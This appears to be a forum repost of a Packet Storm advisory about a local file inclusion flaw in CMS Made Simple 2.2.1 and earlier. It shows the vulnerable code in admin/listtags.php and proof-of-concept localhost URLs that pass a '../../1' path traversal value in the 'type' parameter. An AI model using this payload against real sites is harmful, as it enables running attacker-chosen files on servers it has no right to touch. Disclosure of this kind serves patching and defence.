CMS Made Simple 2.2.1 Local File Inclusion

#199
Topic created · 1 Posts · 1 Views
  • CMS Made Simple versions 2.2.1 and below suffers from a local inclusion vulnerability.
    MD5 | b3f295af95e08dea0b4737419f60d4db
    Download

    =======  
    Details  
    =======  
    Software:cmsmadesimple  
    Homepage:http://www.cmsmadesimple.org/<http://www.cmsmadesimple.org/><http://www.cmsmadesimple.org/>  
    version:<=2.2.1  
    description:The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.  
    ========  
    PoC:  
    ========  
    For cmsmadesimple <=2.1.6:  
    The Vulnerability is existing in /cmsms/admin/listtags.php Line 82 and line 54  
    If there is a file named "1.phpinfo.php" in http://127.0.0.1/1.phpinfo.php  
    So when we visit the following link:  
    http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp  
    http://127.0.0.1/cmsms/admin/listtags.php?_sk_=08852e62af02bc03&action=showpluginhelp&plugin=phpinfo&  
    type=../../1  
    local file inclusion successfully!  
    For cmsmadesimple <=2.2.1:  
    Current version is still vulnerable.  
    if ($action == "showpluginhelp") {  
    $content = '';  
    $file = $find_file("$type.$plugin.php");  
    if( is_file($file) ) require_once($file);  
    =========  
    Reference  
    ==========  
    https://lightrains.org/local-file-inclusion-in-cmsmadesimple/  
    

    Source: packetstormsecurity.com

Log in to reply